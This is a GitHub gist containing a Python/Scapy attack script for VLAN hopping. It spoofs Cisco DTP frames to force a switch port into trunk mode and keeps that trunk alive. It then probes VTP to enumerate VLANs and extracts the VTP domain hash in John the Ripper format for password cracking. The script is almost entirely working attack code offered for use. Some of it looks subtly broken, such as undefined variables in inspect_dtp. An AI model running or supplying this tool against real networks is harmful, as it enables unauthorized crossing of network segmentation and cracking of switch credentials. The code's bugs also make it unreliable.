Skip to content

Instantly share code, notes, and snippets.

@fl0l0u
Created August 3, 2024 07:29
Show Gist options
  • Select an option

  • Save fl0l0u/b874617b2f54028a523d049af182d66b to your computer and use it in GitHub Desktop.

Select an option

Save fl0l0u/b874617b2f54028a523d049af182d66b to your computer and use it in GitHub Desktop.
Vlan hopping via DTP with VTP probbing
import sys
import threading
import time
import scapy
import scapy.contrib.dtp
from scapy.contrib.dtp import *
import scapy.contrib.vtp
from scapy.contrib.vtp import *
from scapy.sendrecv import sniff
from scapy.layers.l2 import *
from scapy.interfaces import resolve_iface
from scapy.sendrecv import AsyncSniffer
# FlL: originally broken condition
VTPVlanInfo.fields_desc[-1].cond = lambda pkt:pkt.type == pkt.type
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'iface' : 'eth0',
'domain': b'\x00'*8
}
stop_threads = False
# -- utils --
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# -- DTP --
def capture_dtp():
print('[.] Listening for DTP packet')
src = resolve_iface(config['iface']).mac
pkt = sniff(filter=f'ether src not {src} and ether dst 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2004 or ether[20:2] = 0x2004)', iface=config['iface'], count=1, timeout=35)
if len(pkt) > 0:
print('[+] DTP packet captured!')
return pkt[0]
else:
Logger.fail('No DTP packet sniffed in 35s')
print('[!] VLAN Hopping is not possible.')
return False
def inspect_dtp(dtp):
# https://gitlab.com/wireshark/wireshark/-/blob/master/epan/dissectors/packet-dtp.c#L69
dtpstatus = ord(dtp[DTPStatus].status)
dtptos = { 0x00: 'Access', 0x80: 'Trunk' }[(dtpstatus & 0x80)]
dtptas = { 0x01: 'On', 0x02: 'Off', 0x03: 'Desirable', 0x04: 'Auto' }[(dtpstatus & 0x07)]
Logger.info(f'DTP status Operative:{dtptos} / Administrative:{dtptas}')
if dtpope == 'Trunk':
print('[+] Already in trunk mode')
elif dtpadm in ('On', 'Desirable', 'Auto'):
print('[+] Access mode, trunk is negociable')
else:
print('[!] Access mode, trunk is not negociable')
return False
print('[>] After Hopping to other VLANs - leave this program running to maintain connections.')
return True
def flood_trunking():
while not stop_threads:
src = resolve_iface(config['iface']).mac
dot3 = Dot3(src=src, dst='01:00:0c:cc:cc:cc')
llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03)
snap = SNAP(OUI=0x0c, code=0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver=1, tlvlist=[
DTPDomain(domain=config['domain']),
DTPStatus(type=2, status=b'\x03'),
DTPType(type=3, dtptype=b'\xa5', length=5),
DTPNeighbor(type=4, neighbor=src)
])
frame = dot3 / llc / snap / dtp
Logger.dbg(f'SENT: DTP Trunk Keep-Alive:\n{frame.summary()}')
sendp(frame, iface=config['iface'], verbose=False)
time.sleep(30)
def enable_trunking():
print('[.] Initiating DTP trunk')
t = threading.Thread(target=flood_trunking)
t.daemon = True
t.start()
return t
def check_trunking():
dtp = capture_dtp()
stat = -1
if dtp:
for tlv in dtp[DTP].tlvlist:
if tlv.type == 2:
stat = ord(tlv.status)
if stat > 63:
print('[+] Port is operating in Trunk status')
return True
print('[-] Port is operating in Access status')
return False
def revert_trunking():
src = resolve_iface(config['iface']).mac
dot3 = Dot3(src=src, dst='01:00:0c:cc:cc:cc')
llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03)
snap = SNAP(OUI=0x0c, code=0x2004)
# DTP, Status = Access/Desirable (2), Type: Trunk (3)
dtp = DTP(ver=1, tlvlist=[
DTPDomain(domain=b'\x00\x00\x00\x00\x00\x00\x00\x00'),
DTPStatus(type=2, status=b'\x02'),
DTPType(type=3, dtptype=b'\xa5', length=5),
DTPNeighbor(type=4, neighbor=src)
])
frame = dot3 / llc / snap / dtp
Logger.dbg(f'SENT: DTP Trunk Shutdown:\n{frame.summary()}')
sendp(frame, iface=config['iface'], verbose=False)
# -- VTP --
def probe_vtp():
print('[.] Probing VTP to determine vlans')
iface = config['iface']
src = resolve_iface(config['iface']).mac
ether = Ether(dst='01:00:0c:cc:cc:cc')
llc = LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03)
snap = SNAP(OUI=0x0c, code=0x2003)
vtp = VTP(ver=1, code=3, domname=config['domain'])
frame = ether / llc / snap / vtp
Logger.dbg(f'SENT: VTP Adv Request:\n{frame.summary()}')
sniffer = AsyncSniffer(filter='ether dst 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2003 or ether[20:2] = 0x2003)',iface=iface, count=2, timeout=3)
sniffer.start()
sendp(frame, iface=iface, verbose=False)
pkts = sniffer.stop()
if len(pkts) < 2:
print('No VTP response, assuming VPT is off on interface')
return
# recover jth vtp hash
vlans_data = None
salt = None
# diplay info
for pkt in pkts:
if pkt[VTP].vlaninfo:
data = bytes(pkt[LLC].payload)
vlans_data = bytes(pkt[VTP])[40:]
for vlaninfo in pkt[VTP].vlaninfo:
if isinstance(vlaninfo, VTPVlanInfo):
vtype = vlaninfo.get_field('type').i2s[vlaninfo.getfieldval('type')]
vstatus = vlaninfo.get_field('status').i2s[vlaninfo.getfieldval('status')]
vname = vlaninfo.vlanname.decode('ascii').rstrip('\x00')
print(f'[+] {vtype} vlan "{vname}" ID:{vlaninfo.vlanid}, status:{vstatus}')
if vlaninfo.status == 0 and vlaninfo.type == 1:
# Setup interface for this VLAN
Logger.info(f'- adding interface {iface}.{vlaninfo.vlanid} ...')
else:
h = pkt[VTP].md5
salt = bytes(pkt[VTP])
if vlans_data and salt:
print("[+] VTP JtR hash: $vtp$%d$%s$%s$%s$%s$%s" % (salt[0], len(vlans_data), vlans_data.hex(), len(salt), salt.hex(), h.hex()))
# -- Main --
dtp = capture_dtp()
if dtp:
config['domain'] = dtp[DTPDomain].domain
if inspect_dtp(dtp):
enable_trunking()
if check_trunking():
time.sleep(1)
probe_vtp()
try:
while True:
time.sleep(0.2)
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
revert_trunking()
stop_threads = True
time.sleep(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment